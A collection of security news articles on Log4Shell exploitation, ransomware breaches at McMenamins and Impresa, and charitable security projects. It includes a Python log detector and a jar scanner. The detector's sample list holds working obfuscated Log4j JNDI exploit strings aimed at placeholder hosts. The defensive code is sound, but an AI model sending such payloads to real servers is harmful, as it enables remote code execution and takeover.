Microsoft Sees Rampant Log4j Exploit Attempts, Testing

No surprise here: The holidays brought no Log4Shell relief.

Threat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its landing page and guidance around the flaws in Apache’s Log4j logging library.

“We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” according to Microsoft.

This comes on the heels of news that nation-state actors are both testing Log4Shell exploits and already using them in operations. As of Dec. 15, more than 1.8 million exploit attempts, against roughly half of all corporate networks and involving at least 70 distinct malware families, had already been launched against the bugs.

What is Log4Shell?

The remote code execution (RCE) vulnerabilities in Apache Log4j 2 – CVE-2021-44228, CVE-2021-45046, CVE-2021-44832 – are collectively referred to as Log4Shell. Within hours of the initial flaw’s public disclosure on Dec. 10, attackers were scanning for vulnerable servers and unleashing quickly evolving attacks to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT), reverse bash shells for future attacks, Mirai and other botnets, and backdoors.

The attack surface exposed by Log4Shell is vast, the impact severe and the potential for widespread exploitation ample. The flaw is trivial to exploit, lives in the ubiquitous Java logging library Apache Log4j and can give an unauthenticated attacker RCE and complete server takeover.

Within three days of the flaw’s disclosure, variants of the exploit were circulating. Within 10 days, the notorious Conti ransomware gang had built a complete Log4Shell attack chain. As of last week, Dec. 30, the advanced persistent threat (APT) Aquatic Panda was targeting universities with Log4Shell exploit tools in an attempt to steal industrial intelligence and military secrets.

Obfuscated HTTP Requests

Most recently, Microsoft has observed attackers obfuscating the HTTP requests made against targeted systems. Those requests carry a string that ends up in a log written by Log4j 2, which interprets it as a Java Naming and Directory Interface (JNDI) lookup. Resolving that lookup makes the vulnerable process connect to an attacker-controlled server, fetch whatever the server points it to, and execute the payload.

In many of the attacks Microsoft has observed, the attacker-controlled endpoint is a DNS logging service: the lookup is meant only to trigger a DNS query against the attacker’s domain, so that the attacker can fingerprint which systems are vulnerable. The crafted string that triggers Log4Shell contains “jndi,” followed by the protocol – such as “ldap,” “ldaps,” “rmi,” “dns,” “iiop” or “http” – and then the attacker’s domain.

But to evade detection, attackers are varying the request patterns. For example, Microsoft has seen exploit strings that wrap individual characters in Log4j’s own lower and upper case-conversion lookups, so that the literal text “jndi” never appears in the request even though Log4j reassembles it when it evaluates the string. Even more elaborate nesting is being used to get past string-matching detections.
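The obfuscation described above is what defeats a plain “jndi:ldap” string match. The following detector is an added example written for this page, not code from Microsoft or from the Threatpost article: it URL-decodes a request line and then evaluates Log4j 2 lookups inside-out the way Log4j itself would, collapsing the lower and upper lookups the article mentions and, going a step beyond the article, the default-value syntax (`${anything:-x}`, `${::-x}`), which is another lookup form attackers nest for the same purpose. Only once the string has been normalized does it look for the JNDI scheme and host. The sample log lines are constructed for the example; the IP addresses are from documentation ranges.

```python
import re
from urllib.parse import unquote

# Innermost Log4j 2 lookup: ${...} with no nested braces inside.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A fully resolved JNDI lookup: ${jndi:<scheme>:[//]<host>...}
JNDI_URI = re.compile(r"\$\{jndi:\s*([a-z][a-z0-9+.-]*):(?://)?([^/:}\s]+)", re.I)

MAX_ROUNDS = 32  # nesting-depth bound so hostile input cannot spin the loop forever


def resolve_lookup(body):
    """Evaluate one innermost, non-jndi lookup body the way Log4j 2 would.

    Covers the lookups attackers nest to hide the literal string 'jndi':
      ${lower:X} / ${upper:X}     case conversion
      ${name:-X} and ${::-X}      default-value syntax, e.g. ${env:NOPE:-j} -> 'j'
    Any other lookup (env, sys, date, ...) is replaced with an empty string,
    a simplification that is sufficient for detection purposes.
    """
    name, _, arg = body.partition(":")
    name = name.strip().lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return ""


def normalize(text):
    """URL-decode, then collapse nested lookups inside-out until only ${jndi:...} remains."""
    text = unquote(text)
    for _ in range(MAX_ROUNDS):
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group(1)
            if body.partition(":")[0].strip().lower() == "jndi":
                return m.group(0)  # keep the lookup we are hunting for
            changed = True
            return resolve_lookup(body)

        text = LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def extract_jndi(text):
    """Return (scheme, host) of the first JNDI lookup after de-obfuscation, or None."""
    m = JNDI_URI.search(normalize(text))
    return (m.group(1).lower(), m.group(2)) if m else None


def naive_match(text):
    """The kind of literal string match the obfuscation is designed to evade."""
    t = text.lower()
    return any(p in t for p in ("jndi:ldap", "jndi:rmi", "jndi:dns"))


# Constructed sample access-log lines (not real traffic); 198.51.100.0/24 and
# 203.0.113.0/24 are documentation ranges.
SAMPLES = [
    ("plain",
     '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.23:1389/a}"'),
    ("lower",
     '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.23:1389/a}"'),
    ("default_value",
     '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.23:1099/x}"'),
    ("env_default",
     '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//198.51.100.23:1389/a}"'),
    ("url_encoded",
     '203.0.113.9 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fprobe.example%2Fa%7D HTTP/1.1" 404 "-"'),
    ("benign",
     '203.0.113.9 - - "GET /login?user=${lower:ADMIN} HTTP/1.1" 200 "Mozilla/5.0"'),
]


def detect_all():
    return {label: extract_jndi(line) for label, line in SAMPLES}


if __name__ == "__main__":
    for label, line in SAMPLES:
        print(f"{label:14} naive={naive_match(line)!s:5} normalized={extract_jndi(line)}")
```

Running it shows the point of the section: the naive match fires only on the plain sample, while the normalizer recovers the scheme and host from every obfuscated variant and stays quiet on the benign line that merely uses a harmless lookup. In production this logic belongs at the log-ingestion or WAF layer, fed by the raw request, since by the time Log4j has written the log the lookup has already been evaluated.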

Minecraft Servers Still Being Exploited

Exploitation continues on non-Microsoft-hosted Minecraft servers, the company said: the same type of servers on which in-the-wild Log4Shell exploitation was first observed.

Microsoft confirmed public reports of Khonsari ransomware being delivered as a post-exploitation payload, as Bitdefender has detailed. Microsoft Defender antivirus data has shown a small number of cases being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via a third-party Minecraft mod loader, the company said.

“In these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients,” Microsoft said. “We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of javaw.exe to ransom the device.”

While Minecraft isn’t commonly installed in enterprise networks, Microsoft has nonetheless also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, enabling an actor to fully take over a compromised system, which they then use to run Mimikatz to steal credentials.

“These techniques are typically associated with enterprise compromises with the intent of lateral movement,” Microsoft said, so the goal in targeting Minecraft users, who tend to be children, is unclear. It’s early yet in this campaign: There hasn’t been detectable follow-on activity, “indicating that the attacker may be gathering access for later use.”

Microsoft urged Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.

Nation-State Activity

Microsoft’s Threat Intelligence Center (MSTIC) has also observed the CVE-2021-44228 flaw being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea and Turkey.

The activity ranges from experimentation during exploit development, to integrating the vulnerabilities into in-the-wild payload deployment, to launching exploitation attempts against targets.

One example: MSTIC has observed the ransomware-wielding Iranian actor Phosphorus – aka Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef or Newscaster, et al. – acquiring and modifying the Log4j exploit.

“We assess that Phosphorus has operationalized these modifications,” Microsoft observed.

MSTIC has also seen the China-linked Hafnium group using the vulnerability to attack virtualization infrastructure in order to extend the group’s typical targeting. “In these attacks, Hafnium-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems,” researchers noted.

Microsoft’s “I’m-a-broken-record” advice: Update affected products and services, and apply security patches ASAP.

“With nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible,” Microsoft said.

RAT Infestation

Microsoft is also seeing additional remote-access toolkits and reverse shells being dropped via exploitation of CVE-2021-44228 – tooling that actors use for hands-on-keyboard attacks. Besides the Cobalt Strike beacons and PowerShell reverse shells seen in earlier reports, the company has also seen Meterpreter, Bladabindi and HabitsRAT.

“Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally,” Microsoft noted.

The activity consists of small-scale and possibly more targeted attacks, some of them possibly related to testing campaigns, the software giant said. Researchers have also observed CVE-2021-44228 being added to existing campaigns that were already exploiting other vulnerabilities to drop remote-access tools; Microsoft said the HabitsRAT campaign overlapped with infrastructure used in prior campaigns.

Other Log4Shell Developments

Microsoft has also seen:

Multiple ransomware access brokers using the vulnerability to gain initial access to target networks – access that they sell to ransomware-as-a-service (RaaS) affiliates. “We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms,” Microsoft said.

Mass scanning by both attackers and security researchers. The vulnerability has rapidly been folded into existing botnets like Mirai, into existing campaigns that previously targeted vulnerable Elasticsearch systems to deploy cryptocurrency miners, and into activity deploying the Tsunami backdoor to Linux systems. “Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JNDI:ldap:// request to launch bash commands on Linux and PowerShell on Windows,” the company said.

No big spikes in ransomware attacks. True, ransomware has been delivered via modified Minecraft clients, but so far it’s been only a small number of cases. That could change, given that access brokers associated with RaaS affiliates are folding the vulnerability into their initial-access toolkits. But Microsoft is also seeing older ransomware payloads in limited use by security researchers and a small number of attackers. “In some instances, they appear to be experimenting with deployments via scanning and modified Minecraft servers,” Microsoft said. “As part of these experiments, some ransomware payloads seem to have been deployed to systems that were previously compromised and were originally dropping coin-miner payloads.”

Webtoos Malware. Webtoos, a malware with distributed denial-of-service (DDoS) capabilities and persistence mechanisms that could allow an attacker to wreak yet more havoc, is also being deployed via the Log4Shell vulnerability. “Attackers’ use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability,” Microsoft said.

Microsoft’s post has extensive advice on attack vectors and observed activity, finding and remediating vulnerable apps and systems, detecting and responding to exploitation attempts and other related attacker activity, and indicators of compromise (IoCs).

This Is Just the Start

As if all that weren’t enough, it’s all likely going to get worse, Microsoft said. Just like Log4j is tucked away into nooks and crannies, so too are exploits going to get added to yet more attacker toolkits: “The majority of attacks we have observed so far have been mainly mass scanning, coin-mining, establishing remote shells and red-team activity, but it’s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits,” Microsoft said.

How Do You Even Know Where Log4j Is Lurking?

A massive part of the Log4Shell nightmare is the fact that it’s not always obvious which software is using a vulnerable version of the Log4j library.

While Microsoft has laid out several methods for detecting active exploit attempts using Log4j, identifying the vulnerable version before an attack would be “ideal,” according to Ray Kelly, a fellow at NTT Application Security.

“This will be a continuing battle for both consumers and vendors going forward into 2022 in what will need to be a two-pronged approach,” Kelly told Threatpost. “Security vendors have been quick on the response for consumers by adding log4j rules that enable DAST [dynamic application security testing] scanners to detect if a website can be exploited with a malicious log4j web request against a company’s web server. At the same time, vendors must ensure that they are not shipping software with the vulnerable version using tools such as SCA [software composition analysis].”
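The inventory problem Kelly describes is tractable on a single host: the version of log4j-core is recorded in the pom.properties file Maven embeds in the jar, and the presence or absence of JndiLookup.class tells you whether the widely recommended stop-gap (deleting that class) was applied. The scanner below is an added example written for this page; it is not Microsoft’s, NTT’s or Threatpost’s tooling. It walks a directory tree, opens every jar, war and ear (recursing into archives nested inside archives, which is where Log4j most often hides), and maps the version it finds onto the three CVEs the article lists, including the 2.12.x (Java 7) and 2.3.x (Java 6) backport branches. The fixture jars it builds are constructed for the demonstration and contain no real bytecode. Pre-release suffixes such as “2.0-beta9” are treated as the numeric prefix, so very old betas are flagged slightly conservatively.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); pre-release suffixes such as '2.0-beta9' are ignored."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(g or 0) for g in m.groups()) if m else None


def assess(version, has_jndi_lookup):
    """CVEs a log4j-core build is exposed to, from its version and whether JndiLookup.class is present."""
    if version is None:
        return ["unknown version, JndiLookup.class present"] if has_jndi_lookup else []
    major, minor, patch = version
    if major != 2:
        return []  # Log4j 1.x is a different code base and is not affected by Log4Shell

    def fixed(mainline, java7_patch, java6_patch):
        # Each fix shipped in the 2.x mainline and was backported to 2.12.x (Java 7) and 2.3.x (Java 6).
        if minor == 12:
            return patch >= java7_patch
        if minor == 3:
            return patch >= java6_patch
        return version >= mainline

    cves = []
    if not fixed((2, 15, 0), 2, 1):
        cves.append("CVE-2021-44228")
    if not fixed((2, 16, 0), 2, 1):
        cves.append("CVE-2021-45046")
    if not fixed((2, 17, 1), 4, 2):
        cves.append("CVE-2021-44832")
    if not has_jndi_lookup:
        # Deleting JndiLookup.class was the stop-gap for the lookup CVEs; it does not
        # touch the JDBC-appender code path behind CVE-2021-44832.
        cves = [c for c in cves if c == "CVE-2021-44832"]
    return cves


def scan_archive(source, label, findings):
    """Inspect one archive (path or file-like) and recurse into archives nested inside it."""
    try:
        zf = zipfile.ZipFile(source)
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            m = re.search(r"^version=(.+)$", zf.read(POM_PROPS).decode("utf-8", "replace"), re.M)
            version = parse_version(m.group(1)) if m else None
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            findings.append({"path": label, "version": version,
                             "jndi_lookup": has_jndi, "cves": assess(version, has_jndi)})
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                scan_archive(io.BytesIO(zf.read(name)), f"{label}!{name}", findings)


def scan_tree(root):
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_EXT:
            scan_archive(str(p), p.relative_to(root).as_posix(), findings)
    return findings


def _jar_bytes(version=None, jndi=True):
    """Minimal fake log4j-core jar built in memory (constructed fixture, not the real library)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only; never loaded
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return buf.getvalue()


def build_sample_tree(root):
    """Lay out constructed fixtures that exercise each branch of assess()."""
    root = Path(root)
    for sub in ("lib", "mitigated", "shaded"):
        (root / sub).mkdir(parents=True, exist_ok=True)
    (root / "lib" / "log4j-core-2.14.1.jar").write_bytes(_jar_bytes("2.14.1"))
    (root / "lib" / "log4j-core-2.12.2.jar").write_bytes(_jar_bytes("2.12.2"))
    (root / "lib" / "log4j-core-2.17.1.jar").write_bytes(_jar_bytes("2.17.1"))
    (root / "mitigated" / "log4j-core-2.14.1.jar").write_bytes(_jar_bytes("2.14.1", jndi=False))
    (root / "shaded" / "app-all.jar").write_bytes(_jar_bytes(None))  # repackaged; no pom.properties
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:  # nested archive: war -> WEB-INF/lib -> jar
        zf.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", _jar_bytes("2.15.0"))
    (root / "app.war").write_bytes(war.getvalue())


def demo():
    root = tempfile.mkdtemp()
    build_sample_tree(root)
    return {f["path"]: f for f in scan_tree(root)}


if __name__ == "__main__":
    for label, f in demo().items():
        ver = ".".join(map(str, f["version"])) if f["version"] else "?"
        print(f"{label:45} {ver:8} JndiLookup={f['jndi_lookup']!s:5} {', '.join(f['cves']) or 'not affected'}")
```

The shaded-jar case is the one that matters most in practice: a repackaged application jar carries the vulnerable class but no pom.properties, so a scanner keyed only on file names or Maven metadata walks straight past it. Point `scan_tree` at an application’s install directory to get the same report for real artifacts.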

Asking What to Do? It’s a Little Late for That

Jake Williams, co-founder and CTO at BreachQuest, echoed Microsoft’s assertion that this vulnerability will have an extremely long tail for exploitation, considering that many organizations don’t even realize they’re running vulnerable software.

“Unfortunately (and nobody wants to hear this), there’s nothing left to say about remediating log4j that hasn’t already been said hundreds of times,” Williams told Threatpost. “Any organization asking today what they need to do regarding log4j almost certainly has an incident on their hands. Every organization with a security team knows what needs to be done to hunt down log4j, they just need the resources and political backing to actually get it done. Being exploited through an internet-facing system running vulnerable log4j at this point is a leadership failure, not a technical one.”

5 Security Projects That Are Giving Back

Editor’s note: We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

While it’s always nice to receive gifts, the holiday season is more about giving – whether you’re buying something nice for the people you love or giving back to the community to help ensure others enjoy the holidays as much as you do.

Giving back is exactly what we’ll be focusing on in today’s Hacky Holidays post, as it’s a theme that truly resonates with those in the security industry. From white-hat hackers to those volunteering their time to make the internet a safer, more inclusive space, we’ve highlighted a few security-related projects that exemplify the spirit of giving back.

1. The Innocent Lives Foundation

The Innocent Lives Foundation aims to identify child predators and help bring them to justice. It does this by leveraging the combined power of the information security community to create tools that unmask anonymous child predators online. Then, using open-source intelligence (OSINT) data and cutting-edge techniques, the team builds a path to capturing evidence and passes those details on to law enforcement for them to recreate.

The Innocent Lives Foundation was first started by Chris Hadnagy, who joined us on an episode of our Security Nation podcast back in 2020. He worked on a few cases at Social-Engineer, LLC, that tracked and captured predators who trafficked and exploited children. When he saw the impact these crimes had on innocent people, he knew he had to do something about it. As a leader in the information security community, he chose to rally a group of security experts and professionals in the social engineering field to address these problems and prevent crimes against future victims.

The foundation is serving endangered children and building a world in which all children can live innocent lives. It’s difficult, emotionally taxing work, but it’s making the world a better place, and it’s the perfect example of giving back.

If you’d like to donate to the cause — it can cost up to $10,000 to produce one file to send to law enforcement, so donations are needed and welcomed — you can do so on the foundation’s website. Aside from donating, there are numerous other ways to get involved, including reporting a case, sharing support online, or even volunteering your security skills when applications are opened.

2. No More Ransom

Today, ransomware is rampant. This fact won’t surprise anyone working in the security industry, but many normal users around the world don’t know what ransomware is, how to defend against it, and what to do if they fall victim to a scam. That’s where No More Ransom comes into play.

No More Ransom is an initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky, and McAfee with a simple mission: to help victims of ransomware retrieve their encrypted data without paying criminals a single dime in the process.

The initiative aims to achieve this mission in two ways:

  1. By compiling a repository of keys and applications that can decrypt data locked by different types of ransomware
  2. By spreading awareness about ransomware and educating the world about prevention methods they can employ in their daily lives

While it’s not always possible to regain access to files encrypted by or systems locked by ransomware, No More Ransom has helped many do exactly that with its repository. And by sharing simple, easy-to-follow cybersecurity advice, the initiative is creating a better informed world of users who understand how to prevent falling victim to ransomware in the first place.

In the five years since its creation, the No More Ransom initiative has:

  • Built a library of 121 free tools
  • Been able to decrypt 151 ransomware families
  • Seen more than 6 million downloads of its tools
  • Prevented $900 million in criminal profit

If you’d like to do your part, the No More Ransom project is always looking for new partners to spread their messaging, so if your organization wants to be more security-minded and give back to the security community in general, consider joining the list of many partners. If you ever fall victim to ransomware, you can also report the crime, which will help identify new types of ransomware and aid future prevention.

3. CIAS Gaming

Established by the University of Texas at San Antonio, the Center for Infrastructure Assurance and Security (CIAS) conducts research into effective ways to engage students with cybersecurity principles through educational gaming — and as part of their work, they’re making cybersecurity relatable, fun, and engaging for kids.

The CIAS Gaming program targets four demographics: elementary school, middle school, high school, and colleges and universities. Its mission is to deliver quality research, training, competition, and exercise programs to advance community and organizational cybersecurity capabilities and collaboration.

Currently, the CIAS K-12 Program consists of a few educational tools. These include:

  • A collectible card game and electronic download called Cyber Threat Defender
  • A multiplayer card game for students in third through fifth grade called Cyber Threat Protector
  • A card game for K-2 players with simple design and reinforced concepts called Cyber Threat Guardian
  • An electronic game that teaches techniques for encoding and decoding ciphers to hide or discover information called Project Cipher
  • A testing tool and platform that gives educators a way to create quizzes and introduce students to cybersecurity principles called the Pyramid of Knowledge
  • Interactive activities, like activity sheets and games, introduced to kids by the CyBear cybersecurity mascots

CIAS Gaming is shaping the future of cybersecurity by training the next generation in cybersecurity best practices. You can access and download these tools and games from the CIAS website, or reach out directly to CIAS to learn more about taking part in their competitions or trainings.

4. The Alliance for Securing Democracy

The Alliance for Securing Democracy (ASD) is a nonpartisan initiative housed within the German Marshall Fund of the United States that aims to combat autocratic efforts to undermine and interfere in democratic institutions around the world. The ASD contributes research and analysis on how a range of tools, from cyberattacks and disinformation to support for extremism, are being used to weaken democracies. It also provides public dashboards to expose the effects of online influence networks and the themes being promoted by foreign powers to threaten democratic institutions.

The ASD is independently funded by more than 175 private individuals and small family foundations across the political spectrum. Its team brings together a diverse staff with expertise across industries, including technology and cybersecurity, to provide research, policy recommendations, and even analysis of key issues and threats. It also has a technical advisory committee that features experts on disinformation, cybersecurity, illicit finance, and more.

The ASD has conducted a significant amount of work in the area of cybersecurity, and it has compiled a toolbox that documents the techniques being used by malign actors in order to spread awareness of them.

In a more globalized and digitalized world, the work ASD is doing to protect the strength of free and open societies by shining a light on autocratic tactics, closing vulnerabilities in democratic systems, and imposing costs on those who undermine our institutions is more important than ever. You can reach them at info@securingdemocracy.org or donate to the cause.

5. Code for Social Good

Code for Social Good is a nonprofit organization that partners with other nonprofits to provide, at no cost, the technical help they need to achieve their missions. It’s all about volunteering to promote social good: Code for Social Good has built and fostered a volunteer community that promotes welfare by supporting nonprofits in need. That global network consists of professionals from across the tech industry, including technical writers, coders, programmers, and more.

Whether you code for fun, experience, social good, or to make a better world, volunteering at Code for Social Good is a great way to give back. Anyone can sign up as a volunteer, and then, you can browse their list of projects. If you find one applicable to your skills, you can apply and wait for contact from the nonprofit. Nonprofits that need help can also post projects on the site and find volunteers to assist them.

As of this writing, Code for Social Good has 138 projects posted across 122 organizations based in 87 countries. The current volunteer community consists of 2,595 volunteers, and they’re always looking for more help. If you have some extra time, why not take a look and see if you can give back by volunteering your technical skills to a nonprofit in need.

Giving back is an important theme of the holidays and one that’s integral to the cybersecurity community. By giving back to the industry, we can encourage a healthy, flourishing practice that spreads awareness, leading to a better, safer, and brighter tomorrow.

If you’re looking for ways to give back, hopefully these examples inspire you to action. If you’d like to stay in the holiday spirit, check out the rest of our Hacky Holidays specials.

McMenamins Data Breach Affects 12 Years of Employee Info

A ransomware attack on the McMenamins dining and hospitality empire in the Pacific Northwest came along with a data breach covering 12 years of employee data, the organization has confirmed.

The Dec. 12 incident – which some have attributed to the Conti gang – forced McMenamins to shut down various operations, though locations can still receive customers. McMenamins is known for saving and restoring historic buildings throughout Oregon and Washington state and for giving them new lives as eclectic pubs, restaurants, breweries, hotels, movie theaters, concert venues, spas and more. In fact, 20 of its locations are on the National Register of Historic Places.

This week, McMenamins confirmed that the cyberattackers made off with internal employee data for those working for the company between the dates of Jan. 1, 1998 and June 30, 2010. The affected data is a bouillabaisse of classic HR fare: names, addresses, telephone numbers, email addresses, dates of birth, race, ethnicity, gender, disability status, medical notes, performance and disciplinary notes, Social Security numbers, health insurance plan elections, income amounts, and retirement contribution amounts.

The data could be sold and/or used for phishing attacks and other social-engineering efforts, identity theft and more.

“It’s possible that the thieves accessed files containing direct-deposit bank account information as well, but McMenamins does not have a clear indication they did so,” the company said in a Dec. 30 notice.

One ray of promise: No customer data was heisted, the company said.

“We’re devastated our people need to do so, but we’re urging them to vigilantly monitor their accounts and healthcare information for anything unusual,” said Brian McMenamin, one of the brothers who own the business, in a press statement. “They should immediately notify their financial institutions or health providers if they see anything out of sort. They should sign up immediately for free monitoring and identity-theft protection. All the information is on our website, and we encourage them to call with any questions.”

McMenamins said that it is offering past and current employees identity and credit-protection services, as well as a dedicated call center to answer questions about the attack. Letters have gone out to notify all affected individuals as well.

Still Not Recovered from December Ransomware Attack

In the wake of the attack, the company was forced to shut down its IT systems, credit-card point-of-sale systems and corporate email to prevent the further spread of the attack. Three weeks later, the company’s operations are still not remediated, it said, including its central phone system, email, credit-card processing, hotel-reservation system and gift-card processing – core functions for a hospitality group.

For now, the company is asking people to delay their hotel bookings or to call properties directly, and it’s using the third-party Dinerware point-of-sale for credit cards.

“It is unknown when the issue will be resolved and systems back up and running,” the organization said. “Given the impacts to the company’s email system, email responses are delayed.”

Brian McMenamin said the breach “is especially disheartening” given its timing after the “strain and hardship” McMenamins’ employees have gone through over the past two years during the pandemic.

McMenamins has reported the incident to the FBI and is also working with a cybersecurity firm to identify the source and full scope of the attack, the company said.

Some sources have attributed the attack to the Russian-speaking Conti gang – a group that Palo Alto Networks has called “one of the most ruthless” and sophisticated ransomware groups out there. Conti is known to ask for unreasonable ransom amounts, such as the $40 million ransom demand it made of Broward County Public Schools in Fort Lauderdale, Fla., earlier in 2021. It also has a history of hitting organizations while they’re down, as seen in the May 2021 attack on the Irish health service.

It also recently tinkered with its code (and its personnel recruiting) to juice its ability to find and fully destroy backups that victims may otherwise use to restore operations in the wake of a ransomware hit. And, in late December, Conti became one of the first professional gangs to claim a full Log4Shell exploit chain.

Portugal Media Giant Impresa Crippled by Ransomware Attack

Media giant Impresa, which owns the largest television station and newspaper in Portugal, was crippled by a ransomware attack just hours into 2022. The suspected ransomware gang behind the attack goes by the name Lapsus$.

The attack took down the websites of Impresa-owned newspaper Expresso and television station SIC; both remained offline Tuesday morning as the media giant continued its recovery from the New Year’s weekend attack. The server infrastructure critical to Impresa’s operations was affected, and one of Impresa’s verified Twitter accounts was hijacked and used to taunt the company publicly.

Various news outlets also reported the attack, including SIC Noticias, SIC’s news TV station, which tweeted a confirmation of the incident, and Portugal’s Observador newspaper.

“The Impresa group confirms that its Expresso and SIC sites, as well as some of their social media pages, are temporarily unavailable, apparently the target of a computer attack, and that actions are being taken to resolve the situation,” according to the tweet.

Lapsus$ identified itself as the culprit of the attack by defacing all of Impresa’s sites with a ransom note letting the company know that it had gained access to Impresa’s Amazon Web Services account, according to a screenshot of the note posted online by The Record.

Pressure to Pay

It appears Impresa was able to regain control over the account on Monday when all of the sites were put into maintenance mode, showing notes on respective home pages that they were temporarily unavailable.

However, Lapsus$ kept up the pressure on Impresa via Twitter, tweeting from Expresso’s verified Twitter account on Monday to demonstrate that it still had access to company resources, according to Recorded Future.

Neither the company nor Lapsus$ so far has revealed the amount of the extortion payment associated with the incident, which marks the first time the group has attacked an entity in Portugal, Lino Santos, the coordinator of Portugal’s National Cybersecurity Center, told the Observador.

Lapsus$ Group came onto the ransomware scene in 2021 and so far is best known for an attack on the Brazil Ministry of Health last month. That incident took down several online systems, wiping out citizens’ COVID-19 vaccination data and disrupting the system that issues digital vaccination certificates.

More Ransomware on the Way

The attack shows that the significant ramp-up in ransomware attacks in 2021 shows no signs of slowing in the new year.

“Ransomware is not going away,” Dave Pasirstein, chief product officer and head of engineering for TruU wrote in an email to Threatpost. “It’s a lucrative business that is nearly impossible to protect against all risk vectors.”

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools

The threat actor tracked as Aquatic Panda is the latest advanced persistent threat (APT) group to exploit the Log4Shell vulnerability.

Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actor as it used Log4Shell exploit tools against a vulnerable VMware installation at a large, undisclosed academic institution, according to research released Wednesday.

OverWatch quickly notified the organization of the activity so the target could “begin their incident response protocol,” researchers said.

CrowdStrike, among other security firms, has been monitoring for suspicious activity around a vulnerability tracked as CVE-2021-44228 and colloquially known as Log4Shell that was found in the Apache Log4j logging library in early December and immediately set upon by attackers.

Ever-Widening Attack Surface

Due to its ubiquitous use, many common infrastructure products from Microsoft, Apple, Twitter, CloudFlare and others are vulnerable to Log4Shell attacks. Recently, VMware also issued guidance that some components of its Horizon product are vulnerable to Log4j exploits, leading OverWatch to add the VMware Horizon Tomcat web server service to its processes-to-watch list, researchers said.

The Falcon OverWatch team noticed the Aquatic Panda intrusion when the threat actor performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance, they wrote in the post.

“The threat actor then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat-actor tooling hosted on remote infrastructure,” researchers wrote.

The commands were executed on a Windows host under the Apache Tomcat service, researchers said. They triaged the initial activity and immediately sent a critical detection to the victim organization, later sharing additional details directly with their security team, they said.

Eventually, researchers assessed that a modified version of the Log4j exploit was likely used during the course of the threat actor’s operations, and that the infrastructure used in the attack is linked to Aquatic Panda, they said.

Tracking the Attack

OverWatch researchers tracked the threat actor’s activity closely during the intrusion to provide continuous updates to the academic institution as its security administrators scrambled to mitigate the attack, they said.

Aquatic Panda engaged in reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. Researchers also observed the group attempt to discover and stop a third-party endpoint detection and response (EDR) service, they said.

